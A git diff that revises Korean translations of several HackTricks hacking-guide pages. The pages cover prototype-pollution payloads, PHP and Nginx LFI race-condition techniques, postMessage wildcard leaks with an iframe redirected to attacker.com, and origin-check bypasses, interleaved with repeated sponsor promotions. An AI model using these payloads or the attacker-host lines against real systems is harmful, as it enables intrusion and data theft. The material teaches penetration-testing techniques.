또한 Lodash와 같은 라이브러리를 사용하는 시나리오에서는 프로토타입 오염(PP)을 통해 속성을 설정하고 객체 내부에 직접 설정하는 것이 다른 진단 접근 방식을 제공합니다. 응답에서 이러한 속성이 누락된 경우, Lodash가 병합하기 전에 대상 객체에서 속성의 존재 여부를 확인하고 있다는 것을 시사합니다:
```javascript
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
@ -114,7 +114,7 @@ Express가 **UTF-7 콘텐츠를 렌더링하도록** 할 수 있습니다:
### 점 허용
Express에는 **쿼리 문자열 매개변수에서 객체를 생성하는 옵션이** 있습니다.\
이를 사용하여 **프로토타입 오염 취약점을 악용하는** 버그 **체인**에서 확실히 사용할 수 있습니다.
이를 사용하여 **프로토타입 오염 취약점**을 악용하는 **버그 체인**을 만들 수 있습니다.
```json
{"__proto__":{"allowDots":true}}
```
@ -125,13 +125,13 @@ Express에는 **쿼리 문자열 매개변수에서 객체를 생성하는 옵
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 하는 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
@ -139,14 +139,14 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**와 함께 AWS 해킹을 처음부터 전문가까지 배우세요!</strong></summary>
<summary><strong>제로부터 AWS 해킹을 전문가로 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 PDF로 HackTricks를 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)에 가입하거나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 팔로우하세요**.
* **HackTricks** 및 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나** 트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**를 팔로우하세요.**
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유하세요.**
</details>

View file

@ -1,24 +1,24 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong>!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team 전문가)에서</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>AWS 해킹을 처음부터 전문가까지 배우세요</strong></a><strong>!</strong></summary>
다른 방법으로 HackTricks를 지원하는 방법:
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드하고 싶다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)에 가입하거나 [텔레그램 그룹](https://t.me/peass)에 가입하거나** **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **도난당한 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
@ -34,9 +34,9 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
요청을 보내 http://attacker.com/file을 요청하면 서버가 유효한 HTTP 응답으로 응답할 수 있으며, 연결을 열어둔 채로 나중에 추가 데이터를 보내 파일에 기록할 수 있습니다.
다음은 http://attacker.com/file을 요청하는 요청을 보낼 것이며, 서버는 유효한 HTTP 응답으로 응답할 수 있으며, 연결을 열어둔 채로 나중에 추가 데이터를 보내 파일에 기록할 수 있습니다.
이 정보는 php-src 코드의 main/streams/cast.c 부분에서 확인할 수 있습니다.
당신은 main/streams/cast.c의 php-src 코드 부분에서 이 정보를 볼 수 있습니다.
```c
/* Use a tmpfile and copy the old streams contents into it */
@ -50,38 +50,38 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
[**이 CTF**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)는 이전 트릭을 사용하여 해결되었습니다.
공격자는 **피해 서버가 공격자 서버에서 파일을 읽는 연결을 열도록** 유도할 것입니다. 이때 **`compress.zlib`** 프로토콜을 사용합니다.
공격자는 **피해 서버가 공격자 서버에서 파일을 읽는 연결을 열도록** 만듭니다. 이는 **`compress.zlib`** 프로토콜을 사용합니다.
**이 연결이 존재하는 동안** 공격자는 서버에 의해 누출된 임시 파일이 생성된 경로를 **유출**할 것입니다.
**이 연결이 존재하는 동안** 공격자는 서버에 의해 **유출된 임시 파일 경로를 추출**할 것입니다.
**연결이 열려 있는 동안** 공격자는 자신이 제어하는 임시 파일을 **로드하는 LFI를 악용**할 것입니다.
**연결이 열려 있는 동안**, 공격자는 자신이 제어하는 임시 파일을 **로드하는 LFI를 악용**할 것입니다.
그러나 웹 서버에는 **`<?`를 포함하는 파일을 로드하는 것을 방지하는 확인**이 있습니다. 따라서 공격자는 **Race Condition**을 악용할 것입니다. 여전히 열려 있는 연결에서 **공격자**는 **웹 서버**가 **금지된 문자를 포함하는지 확인한 후**에 **파일 내용을 로드하기 전에** **PHP 페이로드를 보낼 것**입니다.
그러나 웹 서버에는 **`<?`를 포함하는 파일을 로드하는 것을 방지하는 확인**이 있습니다. 따라서 공격자는 **Race Condition**을 악용할 것입니다. 여전히 열려 있는 연결에서 **공격자**는 **웹 서버**가 **금지된 문자를 포함하는지 확인한 후** **내용을 로드하기 전에** **PHP 페이로드를 보낼 것**입니다.
자세한 정보는 [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)의 Race Condition 및 CTF 설명을 확인하십시오.
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 하는 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 통해 에너지를 공급받는 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로** 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 **무료**로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>와 함께 **제로**부터 **히어로**가 되는 방법을 통해 AWS 해킹을 배우세요!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)로부터 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**를 팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -2,23 +2,23 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>에서 **제로부터 영웅까지 AWS 해킹 배우기**</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>에서 <strong>AWS 해킹을 처음부터 전문가까지 배우세요</strong>!</summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나 PDF로 HackTricks를 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.
- **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
- **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
- **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있습니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, **무료** 기능을 제공하여 회사나 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인할 수 있습니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
@ -50,9 +50,9 @@ chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
현재 PHP는 PHP-FPM 및 Nginx를 통해 자주 배포됩니다. Nginx는 클라이언트 본문(포스트에 국한되지 않음)이 일정 임계값보다 큰 경우 임시 파일을 작성하는 쉽게 눈여겨보지 못하는 [client body buffering](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) 기능을 제공합니다.
현재 PHP는 PHP-FPM 및 Nginx를 통해 자주 배포됩니다. Nginx는 클라이언트 본문(포스트에 국한되지 않음)이 일정 임계값보다 큰 경우 임시 파일을 작성하는 쉽게 무시될 수 있는 [클라이언트 본문 버퍼링](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) 기능을 제공합니다.
이 기능을 통해 LFIs를 다른 파일 생성 방법 없이 악용할 수 있습니다. 이는 Nginx가 PHP와 동일한 사용자로 실행될 때(일반적으로 www-data로 수행됨) 가능합니다.
이 기능을 통해 Nginx가 PHP와 동일한 사용자로 실행되는 경우(일반적으로 www-data로 수행됨) 다른 파일을 생성하지 않고도 LFI가 악용될 수 있습니다.
관련 Nginx 코드:
```c
@ -71,7 +71,7 @@ if (fd != -1 && !persistent) {
return fd;
}
```
**Nginx**에서 열린 후 **즉시 tempfile이 unlink**되었음을 확인할 수 있습니다. 다행히도 **procfs를 사용하여 삭제된 파일에 대한 참조를 여전히 얻을 수 있습니다**.
그것은 Nginx에 의해 열린 후 **임시 파일이 즉시 링크가 해제**되었음을 볼 수 있습니다. 다행히도 **procfs를 사용하여 삭제된 파일에 대한 참조를 여전히 얻을 수 있습니다**. 경주를 통해:
```
...
/proc/34/fd:
@ -86,7 +86,7 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```
참고: 이 예에서는 PHP의 `include` 함수가 경로를 `/var/lib/nginx/body/0000001368 (deleted)`로 해석하여 파일 시스템에 존재하지 않는 경로를 해결하기 때문에 직접 `/proc/34/fd/15`를 포함할 수 없습니다. 다행히도 `/proc/self/fd/34/../../../34/fd/15`와 같은 간접적인 방법으로 이러한 작은 제한을 우회할 수 있으며, 이를 통해 최종적으로 삭제된 `/var/lib/nginx/body/0000001368` 파일의 내용을 실행할 수 있습니다.
참고: 이 예에서는 PHP의 `include` 함수가 경로를 `/var/lib/nginx/body/0000001368 (deleted)`로 해석하여 파일 시스템에 존재하지 않는 경로를 해결하기 때문에 직접 `/proc/34/fd/15`를 포함할 수 없습니다. 다행히도 `/proc/self/fd/34/../../../34/fd/15`와 같은 간접적인 방법으로 이러한 소규모 제한을 우회할 수 있으며, 이를 통해 최종적으로 삭제된 `/var/lib/nginx/body/0000001368` 파일의 내용을 실행할 수 있습니다.
## 전체 악용
```python
@ -292,28 +292,28 @@ read_file_multiprocess(requests_session, nginx_pids)
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 무료로 엔진을 시해 볼 수 있습니다:
그들의 웹사이트를 방문하여 무료로 엔진을 시해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>제로부터 영웅이 될 때까지 AWS 해킹을 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왹**](https://peass.creator-spring.com)을 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**팔로우**하세요.
* **HackTricks 및 HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>

View file

@ -4,27 +4,27 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
- **회사를 HackTricks에서 광고**하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
- [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
- 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**팔로우**하세요.
- **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 해킹 트릭을 공유하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 무료로 확인할 수 있는 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 무료 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료로** 시험해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -58,14 +58,14 @@ win = open('URL-with-iframe-inside', 'hack', 'width=800,height=300,top=500');
## loop until win.length == 1 (until the iframe is loaded)
win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
```
**targetOrigin**은 '\*' 또는 _https://company.com_과 같은 URL일 수 있습니다.
**targetOrigin**은 '\*' 또는 _https://company.com_과 같은 URL일 수 있음을 유의하십시오.
**두 번째 시나리오**에서는 **메시지가 해당 도메인으로만 전송**될 수 있습니다(창 객체의 출처가 다른 경우에도 해당).
**와일드카드**를 사용하면 **메시지가 모든 도메인으로 전송**될 수 있으며 창 객체의 출처로 전송됩니다.
### iframe 및 **targetOrigin**의 와일드카드 공격
### iframe 및 **targetOrigin**에서의 와일드카드 공격
[**이 보고서**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)에서 설명한 대로, **X-Frame-Header** 보호가 없는 **iframed** 페이지를 찾고, **와일드카드**(\*)를 사용하여 **postMessage**를 통해 **민감한** 메시지를 보내는 페이지를 찾으면 **iframe**의 출처를 **수정**하여 **민감한** 메시지를 제어하는 도메인으로 **유출**할 수 있습니다.
페이지가 iframed될 수 있지만 **targetOrigin**이 **URL로 설정되어 와일드카드가 아닌 경우**, 이 **트릭은 작동하지 않습니다**.
[**이 보고서**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/)에서 설명한대로, **X-Frame-Header** 보호가 없는 페이지를 찾고, **와일드카드**(\*)를 사용하여 **postMessage**를 통해 **민감한** 메시지를 보내는 페이지를 **iframed**할 수 있다면, **iframe**의 **출처를 수정**하여 **민감한** 메시지를 귀하가 제어하는 도메인으로 **유출**할 수 있습니다.
페이지가 iframed될 수 있지만 **targetOrigin**이 **URL로 설정되어 있고 와일드카드가 아닌 경우**, 이 **트릭은 작동하지 않습니다**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -82,7 +82,7 @@ window.frames[0].frame[0][2].location="https://attacker.com/exploit.html";
```
## addEventListener exploitation
**`addEventListener`**는 JS에서 **`postMessages`를 기대하는 함수를 선언하는 데 사용됩니다.**\
**`addEventListener`**는 JS에서 **`postMessages`를 기대하는 함수를 선언하는 데 사용**됩니다.\
다음과 유사한 코드가 사용됩니다:
```javascript
window.addEventListener("message", (event) => {
@ -96,34 +96,34 @@ return;
현재 페이지에서 **이벤트 리스너를 찾으려면** 다음을 수행할 수 있습니다:
- JS 코드에서 `window.addEventListener``$(window).on` (_JQuery 버전_)을 **검색**합니다.
- 개발자 도구 콘솔에서 다음을 **실행**합니다: `getEventListeners(window)`
- JS 코드에서 `window.addEventListener``$(window).on` (_JQuery 버전_)을 **검색**
- 개발자 도구 콘솔에서 다음을 **실행**: `getEventListeners(window)`
![](<../../.gitbook/assets/image (618) (1).png>)
- 브라우저의 개발자 도구에서 _Elements --> Event Listeners_로 이동합니다.
- 브라우저의 개발자 도구에서 _Elements --> Event Listeners_로 이동
![](<../../.gitbook/assets/image (393).png>)
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) 또는 [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)와 같은 **브라우저 확장 프로그램**을 사용할 수 있습니다. 이 브라우저 확장 프로그램은 **모든 메시지를 가로채서 표시**합니다.
- [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) 또는 [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker)와 같은 **브라우저 확장 프로그램** 사용. 이 브라우저 확장 프로그램은 **모든 메시지를 가로채서 표시**합니다.
### Origin check bypasses
- **`event.isTrusted`** 속성은 진정한 사용자 조작으로 생성된 이벤트에 대해서만 `True`를 반환하므로 안전하게 간주됩니다. 올바르게 구현된 경우 우회하기 어렵지만, 보안 검사에서의 중요성이 높습니다.
- PostMessage 이벤트에서 원본 유효성을 검사하기 위해 **`indexOf()`** 사용은 우회 수 있습니다. 이 취약점을 설명하는 예는 다음과 같습니다:
- **`event.isTrusted`** 속성은 `True`를 반환하여 진정한 사용자 조치로 생성된 이벤트에 대해서만 안전하다고 간주됩니다. 올바르게 구현된 경우 우회하기 어렵지만, 보안 검사에서의 중요성이 두드러집니다.
- PostMessage 이벤트에서 원본 유효성을 검사하기 위해 **`indexOf()`** 사용은 우회 가능할 수 있습니다. 이 취약점을 설명하는 예는 다음과 같습니다:
```javascript
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
```
- `String.prototype.search()`**`search()`** 메서드는 정규 표현식을 위해 의도된 것이 아니라 문자열에 대해 사용됩니다. 정규 표현식 이외의 것을 전달하면 암시적으로 정규식으로 변환되어 메서드가 잠재적으로 안전하지 않을 수 있습니다. 특히 정규 표현식에서 마침표(.)는 와일드카드로 작동하여 특수하게 작성된 도메인으로 유효성 검사를 우회할 수 있습니다. 예를 들어:
- `String.prototype.search()`**`search()`** 메서드는 정규 표현식을 위해 의도되었으며 문자열에 대해서는 아닙니다. 정규 표현식 이외의 것을 전달하면 암시적으로 정규식으로 변환되어 메서드가 잠재적으로 안전하지 않을 수 있습니다. 특히 정규 표현식에서 마침표(.)는 와일드카드로 작동하여 특별히 설계된 도메인을 사용하여 유효성 검사를 우회할 수 있습니다. 예를 들어:
```javascript
"https://www.safedomain.com".search("www.s.fedomain.com")
```
- `search()`와 유사한 **`match()`** 함수는 정규식을 처리합니다. 정규식이 부적절하게 구성된 경우 우회 가능성이 있습니다.
- **`escapeHtml`** 함수는 문자를 이스케이프하여 입력을 정리하는 데 사용됩니다. 그러나 새로운 이스케이프된 객체를 생성하지 않고 기존 객체의 속성을 덮어씁니다. 이 동작은 악용될 수 있습니다. 특히 객체가 조작되어 제어된 속성이 `hasOwnProperty`를 인식하지 않는 경우, `escapeHtml`은 예상대로 작동하지 않을 수 있습니다. 아래 예시에서 확인할 수 있습니다:
- **`escapeHtml`** 함수는 문자를 이스케이프하여 입력을 살균하는 데 사용됩니다. 그러나 새로운 이스케이프된 객체를 생성하지 않고 기존 객체의 속성을 덮어쓰므로 이 동작은 악용될 수 있습니다. 특히, 객체가 조작되어 제어되는 속성이 `hasOwnProperty`를 인식하지 않는다면 `escapeHtml`은 예상대로 작동하지 않을 수 있습니다. 아래 예시에서 확인할 수 있습니다:
* 예상 실패:
* 예상 실패:
```javascript
result = u({
@ -138,18 +138,16 @@ result = u(new Error("'\"<b>\\"));
result.message; // "'"<b>\"
```
